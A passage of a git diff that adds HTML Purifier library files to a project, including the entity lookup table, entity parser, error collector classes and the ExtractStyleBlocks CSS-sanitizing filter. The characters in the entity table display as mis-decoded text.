$ret[self::unsafeIconv($encoding, 'UTF-8//IGNORE', $c)] = $c; + } + } + $encodings[$encoding] = $ret; + return $ret; + } + + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/EntityLookup.php b/lib/htmlpurifier/library/HTMLPurifier/EntityLookup.php new file mode 100644 index 000000000..b4dfce94c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/EntityLookup.php @@ -0,0 +1,44 @@ +<?php + +/** + * Object that provides entity lookup table from entity name to character + */ +class HTMLPurifier_EntityLookup { + + /** + * Assoc array of entity name to character represented. + */ + public $table; + + /** + * Sets up the entity lookup table from the serialized file contents. + * @note The serialized contents are versioned, but were generated + * using the maintenance script generate_entity_file.php + * @warning This is not in constructor to help enforce the Singleton + */ + public function setup($file = false) { + if (!$file) { + $file = HTMLPURIFIER_PREFIX . '/HTMLPurifier/EntityLookup/entities.ser'; + } + $this->table = unserialize(file_get_contents($file)); + } + + /** + * Retrieves sole instance of the object. + * @param Optional prototype of custom lookup table to overload with. + */ + public static function instance($prototype = false) { + // no references, since PHP doesn't copy unless modified + static $instance = null; + if ($prototype) { + $instance = $prototype; + } elseif (!$instance) { + $instance = new HTMLPurifier_EntityLookup(); + $instance->setup(); + } + return $instance; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/EntityLookup/entities.ser b/lib/htmlpurifier/library/HTMLPurifier/EntityLookup/entities.ser new file mode 100644 index 000000000..e8b08128b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/EntityLookup/entities.ser @@ -0,0 +1 @@ +a:253:{s:4:"fnof";s:2:"Æ’";s:5:"Alpha";s:2:"Α";s:4:"Beta";s:2:"Î’";s:5:"Gamma";s:2:"Γ";s:5:"Delta";s:2:"Δ";s:7:"Epsilon";s:2:"Ε";s:4:"Zeta";s:2:"Ζ";s:3:"Eta";s:2:"Η";s:5:"Theta";s:2:"Θ";s:4:"Iota";s:2:"Ι";s:5:"Kappa";s:2:"Κ";s:6:"Lambda";s:2:"Λ";s:2:"Mu";s:2:"Îœ";s:2:"Nu";s:2:"Î";s:2:"Xi";s:2:"Ξ";s:7:"Omicron";s:2:"Ο";s:2:"Pi";s:2:"Î ";s:3:"Rho";s:2:"Ρ";s:5:"Sigma";s:2:"Σ";s:3:"Tau";s:2:"Τ";s:7:"Upsilon";s:2:"Î¥";s:3:"Phi";s:2:"Φ";s:3:"Chi";s:2:"Χ";s:3:"Psi";s:2:"Ψ";s:5:"Omega";s:2:"Ω";s:5:"alpha";s:2:"α";s:4:"beta";s:2:"β";s:5:"gamma";s:2:"γ";s:5:"delta";s:2:"δ";s:7:"epsilon";s:2:"ε";s:4:"zeta";s:2:"ζ";s:3:"eta";s:2:"η";s:5:"theta";s:2:"θ";s:4:"iota";s:2:"ι";s:5:"kappa";s:2:"κ";s:6:"lambda";s:2:"λ";s:2:"mu";s:2:"μ";s:2:"nu";s:2:"ν";s:2:"xi";s:2:"ξ";s:7:"omicron";s:2:"ο";s:2:"pi";s:2:"Ï€";s:3:"rho";s:2:"Ï";s:6:"sigmaf";s:2:"Ï‚";s:5:"sigma";s:2:"σ";s:3:"tau";s:2:"Ï„";s:7:"upsilon";s:2:"Ï…";s:3:"phi";s:2:"φ";s:3:"chi";s:2:"χ";s:3:"psi";s:2:"ψ";s:5:"omega";s:2:"ω";s:8:"thetasym";s:2:"Ï‘";s:5:"upsih";s:2:"Ï’";s:3:"piv";s:2:"Ï–";s:4:"bull";s:3:"•";s:6:"hellip";s:3:"…";s:5:"prime";s:3:"′";s:5:"Prime";s:3:"″";s:5:"oline";s:3:"‾";s:5:"frasl";s:3:"â„";s:6:"weierp";s:3:"℘";s:5:"image";s:3:"â„‘";s:4:"real";s:3:"â„œ";s:5:"trade";s:3:"â„¢";s:7:"alefsym";s:3:"ℵ";s:4:"larr";s:3:"â†";s:4:"uarr";s:3:"↑";s:4:"rarr";s:3:"→";s:4:"darr";s:3:"↓";s:4:"harr";s:3:"↔";s:5:"crarr";s:3:"↵";s:4:"lArr";s:3:"â‡";s:4:"uArr";s:3:"⇑";s:4:"rArr";s:3:"⇒";s:4:"dArr";s:3:"⇓";s:4:"hArr";s:3:"⇔";s:6:"forall";s:3:"∀";s:4:"part";s:3:"∂";s:5:"exist";s:3:"∃";s:5:"empty";s:3:"∅";s:5:"nabla";s:3:"∇";s:4:"isin";s:3:"∈";s:5:"notin";s:3:"∉";s:2:"ni";s:3:"∋";s:4:"prod";s:3:"âˆ";s:3:"sum";s:3:"∑";s:5:"minus";s:3:"−";s:6:"lowast";s:3:"∗";s:5:"radic";s:3:"√";s:4:"prop";s:3:"âˆ";s:5:"infin";s:3:"∞";s:3:"ang";s:3:"∠";s:3:"and";s:3:"∧";s:2:"or";s:3:"∨";s:3:"cap";s:3:"∩";s:3:"cup";s:3:"∪";s:3:"int";s:3:"∫";s:6:"there4";s:3:"∴";s:3:"sim";s:3:"∼";s:4:"cong";s:3:"≅";s:5:"asymp";s:3:"≈";s:2:"ne";s:3:"≠";s:5:"equiv";s:3:"≡";s:2:"le";s:3:"≤";s:2:"ge";s:3:"≥";s:3:"sub";s:3:"⊂";s:3:"sup";s:3:"⊃";s:4:"nsub";s:3:"⊄";s:4:"sube";s:3:"⊆";s:4:"supe";s:3:"⊇";s:5:"oplus";s:3:"⊕";s:6:"otimes";s:3:"⊗";s:4:"perp";s:3:"⊥";s:4:"sdot";s:3:"â‹…";s:5:"lceil";s:3:"⌈";s:5:"rceil";s:3:"⌉";s:6:"lfloor";s:3:"⌊";s:6:"rfloor";s:3:"⌋";s:4:"lang";s:3:"〈";s:4:"rang";s:3:"〉";s:3:"loz";s:3:"â—Š";s:6:"spades";s:3:"â™ ";s:5:"clubs";s:3:"♣";s:6:"hearts";s:3:"♥";s:5:"diams";s:3:"♦";s:4:"quot";s:1:""";s:3:"amp";s:1:"&";s:2:"lt";s:1:"<";s:2:"gt";s:1:">";s:4:"apos";s:1:"'";s:5:"OElig";s:2:"Å’";s:5:"oelig";s:2:"Å“";s:6:"Scaron";s:2:"Å ";s:6:"scaron";s:2:"Å¡";s:4:"Yuml";s:2:"Ÿ";s:4:"circ";s:2:"ˆ";s:5:"tilde";s:2:"Ëœ";s:4:"ensp";s:3:" ";s:4:"emsp";s:3:" ";s:6:"thinsp";s:3:" ";s:4:"zwnj";s:3:"‌";s:3:"zwj";s:3:"â€";s:3:"lrm";s:3:"‎";s:3:"rlm";s:3:"â€";s:5:"ndash";s:3:"–";s:5:"mdash";s:3:"—";s:5:"lsquo";s:3:"‘";s:5:"rsquo";s:3:"’";s:5:"sbquo";s:3:"‚";s:5:"ldquo";s:3:"“";s:5:"rdquo";s:3:"â€";s:5:"bdquo";s:3:"„";s:6:"dagger";s:3:"†";s:6:"Dagger";s:3:"‡";s:6:"permil";s:3:"‰";s:6:"lsaquo";s:3:"‹";s:6:"rsaquo";s:3:"›";s:4:"euro";s:3:"€";s:4:"nbsp";s:2:" ";s:5:"iexcl";s:2:"¡";s:4:"cent";s:2:"¢";s:5:"pound";s:2:"£";s:6:"curren";s:2:"¤";s:3:"yen";s:2:"Â¥";s:6:"brvbar";s:2:"¦";s:4:"sect";s:2:"§";s:3:"uml";s:2:"¨";s:4:"copy";s:2:"©";s:4:"ordf";s:2:"ª";s:5:"laquo";s:2:"«";s:3:"not";s:2:"¬";s:3:"shy";s:2:"Â";s:3:"reg";s:2:"®";s:4:"macr";s:2:"¯";s:3:"deg";s:2:"°";s:6:"plusmn";s:2:"±";s:4:"sup2";s:2:"²";s:4:"sup3";s:2:"³";s:5:"acute";s:2:"´";s:5:"micro";s:2:"µ";s:4:"para";s:2:"¶";s:6:"middot";s:2:"·";s:5:"cedil";s:2:"¸";s:4:"sup1";s:2:"¹";s:4:"ordm";s:2:"º";s:5:"raquo";s:2:"»";s:6:"frac14";s:2:"¼";s:6:"frac12";s:2:"½";s:6:"frac34";s:2:"¾";s:6:"iquest";s:2:"¿";s:6:"Agrave";s:2:"À";s:6:"Aacute";s:2:"Ã";s:5:"Acirc";s:2:"Â";s:6:"Atilde";s:2:"Ã";s:4:"Auml";s:2:"Ä";s:5:"Aring";s:2:"Ã…";s:5:"AElig";s:2:"Æ";s:6:"Ccedil";s:2:"Ç";s:6:"Egrave";s:2:"È";s:6:"Eacute";s:2:"É";s:5:"Ecirc";s:2:"Ê";s:4:"Euml";s:2:"Ë";s:6:"Igrave";s:2:"ÃŒ";s:6:"Iacute";s:2:"Ã";s:5:"Icirc";s:2:"ÃŽ";s:4:"Iuml";s:2:"Ã";s:3:"ETH";s:2:"Ã";s:6:"Ntilde";s:2:"Ñ";s:6:"Ograve";s:2:"Ã’";s:6:"Oacute";s:2:"Ó";s:5:"Ocirc";s:2:"Ô";s:6:"Otilde";s:2:"Õ";s:4:"Ouml";s:2:"Ö";s:5:"times";s:2:"×";s:6:"Oslash";s:2:"Ø";s:6:"Ugrave";s:2:"Ù";s:6:"Uacute";s:2:"Ú";s:5:"Ucirc";s:2:"Û";s:4:"Uuml";s:2:"Ãœ";s:6:"Yacute";s:2:"Ã";s:5:"THORN";s:2:"Þ";s:5:"szlig";s:2:"ß";s:6:"agrave";s:2:"à ";s:6:"aacute";s:2:"á";s:5:"acirc";s:2:"â";s:6:"atilde";s:2:"ã";s:4:"auml";s:2:"ä";s:5:"aring";s:2:"Ã¥";s:5:"aelig";s:2:"æ";s:6:"ccedil";s:2:"ç";s:6:"egrave";s:2:"è";s:6:"eacute";s:2:"é";s:5:"ecirc";s:2:"ê";s:4:"euml";s:2:"ë";s:6:"igrave";s:2:"ì";s:6:"iacute";s:2:"Ã";s:5:"icirc";s:2:"î";s:4:"iuml";s:2:"ï";s:3:"eth";s:2:"ð";s:6:"ntilde";s:2:"ñ";s:6:"ograve";s:2:"ò";s:6:"oacute";s:2:"ó";s:5:"ocirc";s:2:"ô";s:6:"otilde";s:2:"õ";s:4:"ouml";s:2:"ö";s:6:"divide";s:2:"÷";s:6:"oslash";s:2:"ø";s:6:"ugrave";s:2:"ù";s:6:"uacute";s:2:"ú";s:5:"ucirc";s:2:"û";s:4:"uuml";s:2:"ü";s:6:"yacute";s:2:"ý";s:5:"thorn";s:2:"þ";s:4:"yuml";s:2:"ÿ";}
\ No newline at end of file diff --git a/lib/htmlpurifier/library/HTMLPurifier/EntityParser.php b/lib/htmlpurifier/library/HTMLPurifier/EntityParser.php new file mode 100644 index 000000000..8c384472d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/EntityParser.php @@ -0,0 +1,144 @@ +<?php + +// if want to implement error collecting here, we'll need to use some sort +// of global data (probably trigger_error) because it's impossible to pass +// $config or $context to the callback functions. + +/** + * Handles referencing and derefencing character entities + */ +class HTMLPurifier_EntityParser +{ + + /** + * Reference to entity lookup table. + */ + protected $_entity_lookup; + + /** + * Callback regex string for parsing entities. + */ + protected $_substituteEntitiesRegex = +'/&(?:[#]x([a-fA-F0-9]+)|[#]0*(\d+)|([A-Za-z_:][A-Za-z0-9.\-_:]*));?/'; +// 1. hex 2. dec 3. string (XML style) + + + /** + * Decimal to parsed string conversion table for special entities. + */ + protected $_special_dec2str = + array( + 34 => '"', + 38 => '&', + 39 => "'", + 60 => '<', + 62 => '>' + ); + + /** + * Stripped entity names to decimal conversion table for special entities. + */ + protected $_special_ent2dec = + array( + 'quot' => 34, + 'amp' => 38, + 'lt' => 60, + 'gt' => 62 + ); + + /** + * Substitutes non-special entities with their parsed equivalents. Since + * running this whenever you have parsed character is t3h 5uck, we run + * it before everything else. + * + * @param $string String to have non-special entities parsed. + * @returns Parsed string. + */ + public function substituteNonSpecialEntities($string) { + // it will try to detect missing semicolons, but don't rely on it + return preg_replace_callback( + $this->_substituteEntitiesRegex, + array($this, 'nonSpecialEntityCallback'), + $string + ); + } + + /** + * Callback function for substituteNonSpecialEntities() that does the work. + * + * @param $matches PCRE matches array, with 0 the entire match, and + * either index 1, 2 or 3 set with a hex value, dec value, + * or string (respectively). + * @returns Replacement string. + */ + + protected function nonSpecialEntityCallback($matches) { + // replaces all but big five + $entity = $matches[0]; + $is_num = (@$matches[0][1] === '#'); + if ($is_num) { + $is_hex = (@$entity[2] === 'x'); + $code = $is_hex ? hexdec($matches[1]) : (int) $matches[2]; + + // abort for special characters + if (isset($this->_special_dec2str[$code])) return $entity; + + return HTMLPurifier_Encoder::unichr($code); + } else { + if (isset($this->_special_ent2dec[$matches[3]])) return $entity; + if (!$this->_entity_lookup) { + $this->_entity_lookup = HTMLPurifier_EntityLookup::instance(); + } + if (isset($this->_entity_lookup->table[$matches[3]])) { + return $this->_entity_lookup->table[$matches[3]]; + } else { + return $entity; + } + } + } + + /** + * Substitutes only special entities with their parsed equivalents. + * + * @notice We try to avoid calling this function because otherwise, it + * would have to be called a lot (for every parsed section). + * + * @param $string String to have non-special entities parsed. + * @returns Parsed string. + */ + public function substituteSpecialEntities($string) { + return preg_replace_callback( + $this->_substituteEntitiesRegex, + array($this, 'specialEntityCallback'), + $string); + } + + /** + * Callback function for substituteSpecialEntities() that does the work. + * + * This callback has same syntax as nonSpecialEntityCallback(). + * + * @param $matches PCRE-style matches array, with 0 the entire match, and + * either index 1, 2 or 3 set with a hex value, dec value, + * or string (respectively). + * @returns Replacement string. + */ + protected function specialEntityCallback($matches) { + $entity = $matches[0]; + $is_num = (@$matches[0][1] === '#'); + if ($is_num) { + $is_hex = (@$entity[2] === 'x'); + $int = $is_hex ? hexdec($matches[1]) : (int) $matches[2]; + return isset($this->_special_dec2str[$int]) ? + $this->_special_dec2str[$int] : + $entity; + } else { + return isset($this->_special_ent2dec[$matches[3]]) ? + $this->_special_ent2dec[$matches[3]] : + $entity; + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ErrorCollector.php b/lib/htmlpurifier/library/HTMLPurifier/ErrorCollector.php new file mode 100644 index 000000000..6713eaf77 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ErrorCollector.php @@ -0,0 +1,209 @@ +<?php + +/** + * Error collection class that enables HTML Purifier to report HTML + * problems back to the user + */ +class HTMLPurifier_ErrorCollector +{ + + /** + * Identifiers for the returned error array. These are purposely numeric + * so list() can be used. + */ + const LINENO = 0; + const SEVERITY = 1; + const MESSAGE = 2; + const CHILDREN = 3; + + protected $errors; + protected $_current; + protected $_stacks = array(array()); + protected $locale; + protected $generator; + protected $context; + + protected $lines = array(); + + public function __construct($context) { + $this->locale =& $context->get('Locale'); + $this->context = $context; + $this->_current =& $this->_stacks[0]; + $this->errors =& $this->_stacks[0]; + } + + /** + * Sends an error message to the collector for later use + * @param $severity int Error severity, PHP error style (don't use E_USER_) + * @param $msg string Error message text + * @param $subst1 string First substitution for $msg + * @param $subst2 string ... + */ + public function send($severity, $msg) { + + $args = array(); + if (func_num_args() > 2) { + $args = func_get_args(); + array_shift($args); + unset($args[0]); + } + + $token = $this->context->get('CurrentToken', true); + $line = $token ? $token->line : $this->context->get('CurrentLine', true); + $col = $token ? $token->col : $this->context->get('CurrentCol', true); + $attr = $this->context->get('CurrentAttr', true); + + // perform special substitutions, also add custom parameters + $subst = array(); + if (!is_null($token)) { + $args['CurrentToken'] = $token; + } + if (!is_null($attr)) { + $subst['$CurrentAttr.Name'] = $attr; + if (isset($token->attr[$attr])) $subst['$CurrentAttr.Value'] = $token->attr[$attr]; + } + + if (empty($args)) { + $msg = $this->locale->getMessage($msg); + } else { + $msg = $this->locale->formatMessage($msg, $args); + } + + if (!empty($subst)) $msg = strtr($msg, $subst); + + // (numerically indexed) + $error = array( + self::LINENO => $line, + self::SEVERITY => $severity, + self::MESSAGE => $msg, + self::CHILDREN => array() + ); + $this->_current[] = $error; + + + // NEW CODE BELOW ... + + $struct = null; + // Top-level errors are either: + // TOKEN type, if $value is set appropriately, or + // "syntax" type, if $value is null + $new_struct = new HTMLPurifier_ErrorStruct(); + $new_struct->type = HTMLPurifier_ErrorStruct::TOKEN; + if ($token) $new_struct->value = clone $token; + if (is_int($line) && is_int($col)) { + if (isset($this->lines[$line][$col])) { + $struct = $this->lines[$line][$col]; + } else { + $struct = $this->lines[$line][$col] = $new_struct; + } + // These ksorts may present a performance problem + ksort($this->lines[$line], SORT_NUMERIC); + } else { + if (isset($this->lines[-1])) { + $struct = $this->lines[-1]; + } else { + $struct = $this->lines[-1] = $new_struct; + } + } + ksort($this->lines, SORT_NUMERIC); + + // Now, check if we need to operate on a lower structure + if (!empty($attr)) { + $struct = $struct->getChild(HTMLPurifier_ErrorStruct::ATTR, $attr); + if (!$struct->value) { + $struct->value = array($attr, 'PUT VALUE HERE'); + } + } + if (!empty($cssprop)) { + $struct = $struct->getChild(HTMLPurifier_ErrorStruct::CSSPROP, $cssprop); + if (!$struct->value) { + // if we tokenize CSS this might be a little more difficult to do + $struct->value = array($cssprop, 'PUT VALUE HERE'); + } + } + + // Ok, structs are all setup, now time to register the error + $struct->addError($severity, $msg); + } + + /** + * Retrieves raw error data for custom formatter to use + * @param List of arrays in format of array(line of error, + * error severity, error message, + * recursive sub-errors array) + */ + public function getRaw() { + return $this->errors; + } + + /** + * Default HTML formatting implementation for error messages + * @param $config Configuration array, vital for HTML output nature + * @param $errors Errors array to display; used for recursion. + */ + public function getHTMLFormatted($config, $errors = null) { + $ret = array(); + + $this->generator = new HTMLPurifier_Generator($config, $this->context); + if ($errors === null) $errors = $this->errors; + + // 'At line' message needs to be removed + + // generation code for new structure goes here. It needs to be recursive. + foreach ($this->lines as $line => $col_array) { + if ($line == -1) continue; + foreach ($col_array as $col => $struct) { + $this->_renderStruct($ret, $struct, $line, $col); + } + } + if (isset($this->lines[-1])) { + $this->_renderStruct($ret, $this->lines[-1]); + } + + if (empty($errors)) { + return '<p>' . $this->locale->getMessage('ErrorCollector: No errors') . '</p>'; + } else { + return '<ul><li>' . implode('</li><li>', $ret) . '</li></ul>'; + } + + } + + private function _renderStruct(&$ret, $struct, $line = null, $col = null) { + $stack = array($struct); + $context_stack = array(array()); + while ($current = array_pop($stack)) { + $context = array_pop($context_stack); + foreach ($current->errors as $error) { + list($severity, $msg) = $error; + $string = ''; + $string .= '<div>'; + // W3C uses an icon to indicate the severity of the error. + $error = $this->locale->getErrorName($severity); + $string .= "<span class=\"error e$severity\"><strong>$error</strong></span> "; + if (!is_null($line) && !is_null($col)) { + $string .= "<em class=\"location\">Line $line, Column $col: </em> "; + } else { + $string .= '<em class="location">End of Document: </em> '; + } + $string .= '<strong class="description">' . $this->generator->escape($msg) . '</strong> '; + $string .= '</div>'; + // Here, have a marker for the character on the column appropriate. + // Be sure to clip extremely long lines. + //$string .= '<pre>'; + //$string .= ''; + //$string .= '</pre>'; + $ret[] = $string; + } + foreach ($current->children as $type => $array) { + $context[] = $current; + $stack = array_merge($stack, array_reverse($array, true)); + for ($i = count($array); $i > 0; $i--) { + $context_stack[] = $context; + } + } + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ErrorStruct.php b/lib/htmlpurifier/library/HTMLPurifier/ErrorStruct.php new file mode 100644 index 000000000..9bc8996ec --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ErrorStruct.php @@ -0,0 +1,60 @@ +<?php + +/** + * Records errors for particular segments of an HTML document such as tokens, + * attributes or CSS properties. They can contain error structs (which apply + * to components of what they represent), but their main purpose is to hold + * errors applying to whatever struct is being used. + */ +class HTMLPurifier_ErrorStruct +{ + + /** + * Possible values for $children first-key. Note that top-level structures + * are automatically token-level. + */ + const TOKEN = 0; + const ATTR = 1; + const CSSPROP = 2; + + /** + * Type of this struct. + */ + public $type; + + /** + * Value of the struct we are recording errors for. There are various + * values for this: + * - TOKEN: Instance of HTMLPurifier_Token + * - ATTR: array('attr-name', 'value') + * - CSSPROP: array('prop-name', 'value') + */ + public $value; + + /** + * Errors registered for this structure. + */ + public $errors = array(); + + /** + * Child ErrorStructs that are from this structure. For example, a TOKEN + * ErrorStruct would contain ATTR ErrorStructs. This is a multi-dimensional + * array in structure: [TYPE]['identifier'] + */ + public $children = array(); + + public function getChild($type, $id) { + if (!isset($this->children[$type][$id])) { + $this->children[$type][$id] = new HTMLPurifier_ErrorStruct(); + $this->children[$type][$id]->type = $type; + } + return $this->children[$type][$id]; + } + + public function addError($severity, $message) { + $this->errors[] = array($severity, $message); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Exception.php b/lib/htmlpurifier/library/HTMLPurifier/Exception.php new file mode 100644 index 000000000..be85b4c56 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Exception.php @@ -0,0 +1,12 @@ +<?php + +/** + * Global exception class for HTML Purifier; any exceptions we throw + * are from here. + */ +class HTMLPurifier_Exception extends Exception +{ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Filter.php b/lib/htmlpurifier/library/HTMLPurifier/Filter.php new file mode 100644 index 000000000..9a0e7b09f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Filter.php @@ -0,0 +1,46 @@ +<?php + +/** + * Represents a pre or post processing filter on HTML Purifier's output + * + * Sometimes, a little ad-hoc fixing of HTML has to be done before + * it gets sent through HTML Purifier: you can use filters to acheive + * this effect. For instance, YouTube videos can be preserved using + * this manner. You could have used a decorator for this task, but + * PHP's support for them is not terribly robust, so we're going + * to just loop through the filters. + * + * Filters should be exited first in, last out. If there are three filters, + * named 1, 2 and 3, the order of execution should go 1->preFilter, + * 2->preFilter, 3->preFilter, purify, 3->postFilter, 2->postFilter, + * 1->postFilter. + * + * @note Methods are not declared abstract as it is perfectly legitimate + * for an implementation not to want anything to happen on a step + */ + +class HTMLPurifier_Filter +{ + + /** + * Name of the filter for identification purposes + */ + public $name; + + /** + * Pre-processor function, handles HTML before HTML Purifier + */ + public function preFilter($html, $config, $context) { + return $html; + } + + /** + * Post-processor function, handles HTML after HTML Purifier + */ + public function postFilter($html, $config, $context) { + return $html; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Filter/ExtractStyleBlocks.php b/lib/htmlpurifier/library/HTMLPurifier/Filter/ExtractStyleBlocks.php new file mode 100644 index 000000000..320aa4f16 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Filter/ExtractStyleBlocks.php @@ -0,0 +1,288 @@ +<?php + +// why is this a top level function? Because PHP 5.2.0 doesn't seem to +// understand how to interpret this filter if it's a static method. +// It's all really silly, but if we go this route it might be reasonable +// to coalesce all of these methods into one. +function htmlpurifier_filter_extractstyleblocks_muteerrorhandler() {} + +/** + * This filter extracts <style> blocks from input HTML, cleans them up + * using CSSTidy, and then places them in $purifier->context->get('StyleBlocks') + * so they can be used elsewhere in the document. + * + * @note + * See tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php for + * sample usage. + * + * @note + * This filter can also be used on stylesheets not included in the + * document--something purists would probably prefer. Just directly + * call HTMLPurifier_Filter_ExtractStyleBlocks->cleanCSS() + */ +class HTMLPurifier_Filter_ExtractStyleBlocks extends HTMLPurifier_Filter +{ + + public $name = 'ExtractStyleBlocks'; + private $_styleMatches = array(); + private $_tidy; + + private $_id_attrdef; + private $_class_attrdef; + private $_enum_attrdef; + + public function __construct() { + $this->_tidy = new csstidy(); + $this->_id_attrdef = new HTMLPurifier_AttrDef_HTML_ID(true); + $this->_class_attrdef = new HTMLPurifier_AttrDef_CSS_Ident(); + $this->_enum_attrdef = new HTMLPurifier_AttrDef_Enum(array('first-child', 'link', 'visited', 'active', 'hover', 'focus')); + } + + /** + * Save the contents of CSS blocks to style matches + * @param $matches preg_replace style $matches array + */ + protected function styleCallback($matches) { + $this->_styleMatches[] = $matches[1]; + } + + /** + * Removes inline <style> tags from HTML, saves them for later use + * @todo Extend to indicate non-text/css style blocks + */ + public function preFilter($html, $config, $context) { + $tidy = $config->get('Filter.ExtractStyleBlocks.TidyImpl'); + if ($tidy !== null) $this->_tidy = $tidy; + $html = preg_replace_callback('#<style(?:\s.*)?>(.+)</style>#isU', array($this, 'styleCallback'), $html); + $style_blocks = $this->_styleMatches; + $this->_styleMatches = array(); // reset + $context->register('StyleBlocks', $style_blocks); // $context must not be reused + if ($this->_tidy) { + foreach ($style_blocks as &$style) { + $style = $this->cleanCSS($style, $config, $context); + } + } + return $html; + } + + /** + * Takes CSS (the stuff found in <style>) and cleans it. + * @warning Requires CSSTidy <http://csstidy.sourceforge.net/> + * @param $css CSS styling to clean + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @return Cleaned CSS + */ + public function cleanCSS($css, $config, $context) { + // prepare scope + $scope = $config->get('Filter.ExtractStyleBlocks.Scope'); + if ($scope !== null) { + $scopes = array_map('trim', explode(',', $scope)); + } else { + $scopes = array(); + } + // remove comments from CSS + $css = trim($css); + if (strncmp('<!--', $css, 4) === 0) { + $css = substr($css, 4); + } + if (strlen($css) > 3 && substr($css, -3) == '-->') { + $css = substr($css, 0, -3); + } + $css = trim($css); + set_error_handler('htmlpurifier_filter_extractstyleblocks_muteerrorhandler'); + $this->_tidy->parse($css); + restore_error_handler(); + $css_definition = $config->getDefinition('CSS'); + $html_definition = $config->getDefinition('HTML'); + $new_css = array(); + foreach ($this->_tidy->css as $k => $decls) { + // $decls are all CSS declarations inside an @ selector + $new_decls = array(); + foreach ($decls as $selector => $style) { + $selector = trim($selector); + if ($selector === '') continue; // should not happen + // Parse the selector + // Here is the relevant part of the CSS grammar: + // + // ruleset + // : selector [ ',' S* selector ]* '{' ... + // selector + // : simple_selector [ combinator selector | S+ [ combinator? selector ]? ]? + // combinator + // : '+' S* + // : '>' S* + // simple_selector + // : element_name [ HASH | class | attrib | pseudo ]* + // | [ HASH | class | attrib | pseudo ]+ + // element_name + // : IDENT | '*' + // ; + // class + // : '.' IDENT + // ; + // attrib + // : '[' S* IDENT S* [ [ '=' | INCLUDES | DASHMATCH ] S* + // [ IDENT | STRING ] S* ]? ']' + // ; + // pseudo + // : ':' [ IDENT | FUNCTION S* [IDENT S*]? ')' ] + // ; + // + // For reference, here are the relevant tokens: + // + // HASH #{name} + // IDENT {ident} + // INCLUDES == + // DASHMATCH |= + // STRING {string} + // FUNCTION {ident}\( + // + // And the lexical scanner tokens + // + // name {nmchar}+ + // nmchar [_a-z0-9-]|{nonascii}|{escape} + // nonascii [\240-\377] + // escape {unicode}|\\[^\r\n\f0-9a-f] + // unicode \\{h}}{1,6}(\r\n|[ \t\r\n\f])? + // ident -?{nmstart}{nmchar*} + // nmstart [_a-z]|{nonascii}|{escape} + // string {string1}|{string2} + // string1 \"([^\n\r\f\\"]|\\{nl}|{escape})*\" + // string2 \'([^\n\r\f\\"]|\\{nl}|{escape})*\' + // + // We'll implement a subset (in order to reduce attack + // surface); in particular: + // + // - No Unicode support + // - No escapes support + // - No string support (by proxy no attrib support) + // - element_name is matched against allowed + // elements (some people might find this + // annoying...) + // - Pseudo-elements one of :first-child, :link, + // :visited, :active, :hover, :focus + + // handle ruleset + $selectors = array_map('trim', explode(',', $selector)); + $new_selectors = array(); + foreach ($selectors as $sel) { + // split on +, > and spaces + $basic_selectors = preg_split('/\s*([+> ])\s*/', $sel, -1, PREG_SPLIT_DELIM_CAPTURE); + // even indices are chunks, odd indices are + // delimiters + $nsel = null; + $delim = null; // guaranteed to be non-null after + // two loop iterations + for ($i = 0, $c = count($basic_selectors); $i < $c; $i++) { + $x = $basic_selectors[$i]; + if ($i % 2) { + // delimiter + if ($x === ' ') { + $delim = ' '; + } else { + $delim = ' ' . $x . ' '; + } + } else { + // simple selector + $components = preg_split('/([#.:])/', $x, -1, PREG_SPLIT_DELIM_CAPTURE); + $sdelim = null; + $nx = null; + for ($j = 0, $cc = count($components); $j < $cc; $j ++) { + $y = $components[$j]; + if ($j === 0) { + if ($y === '*' || isset($html_definition->info[$y = strtolower($y)])) { + $nx = $y; + } else { + // $nx stays null; this matters + // if we don't manage to find + // any valid selector content, + // in which case we ignore the + // outer $delim + } + } elseif ($j % 2) { + // set delimiter + $sdelim = $y; + } else { + $attrdef = null; + if ($sdelim === '#') { + $attrdef = $this->_id_attrdef; + } elseif ($sdelim === '.') { + $attrdef = $this->_class_attrdef; + } elseif ($sdelim === ':') { + $attrdef = $this->_enum_attrdef; + } else { + throw new HTMLPurifier_Exception('broken invariant sdelim and preg_split'); + } + $r = $attrdef->validate($y, $config, $context); + if ($r !== false) { + if ($r !== true) { + $y = $r; + } + if ($nx === null) { + $nx = ''; + } + $nx .= $sdelim . $y; + } + } + } + if ($nx !== null) { + if ($nsel === null) { + $nsel = $nx; + } else { + $nsel .= $delim . $nx; + } + } else { + // delimiters to the left of invalid + // basic selector ignored + } + } + } + if ($nsel !== null) { + if (!empty($scopes)) { + foreach ($scopes as $s) { + $new_selectors[] = "$s $nsel"; + } + } else { + $new_selectors[] = $nsel; + } + } + } + if (empty($new_selectors)) continue; + $selector = implode(', ', $new_selectors); + foreach ($style as $name => $value) { + if (!isset($css_definition->info[$name])) { + unset($style[$name]); + continue; + } + $def = $css_definition->info[$name]; + $ret = $def->validate($value, $config, $context); + if ($ret === false) unset($style[$name]); + else $style[$name] = $ret; + } + $new_decls[$selector] = $style; + } + $new_css[$k] = $new_decls; + } + // remove stuff that shouldn't be used, could be reenabled + // after security risks are analyzed + $this->_tidy->css = $new_css; + $this->_tidy->import = array(); + $this->_tidy->charset = null; + $this->_tidy->namespace = null; + $css = $this->_tidy->print->plain(); + // we are going to escape any special characters <>& to ensure + // that no funny business occurs (i.e. </style> in a font-family prop). + if ($config->get('Filter.ExtractStyleBlocks.Escaping')) { + $css = str_replace( + 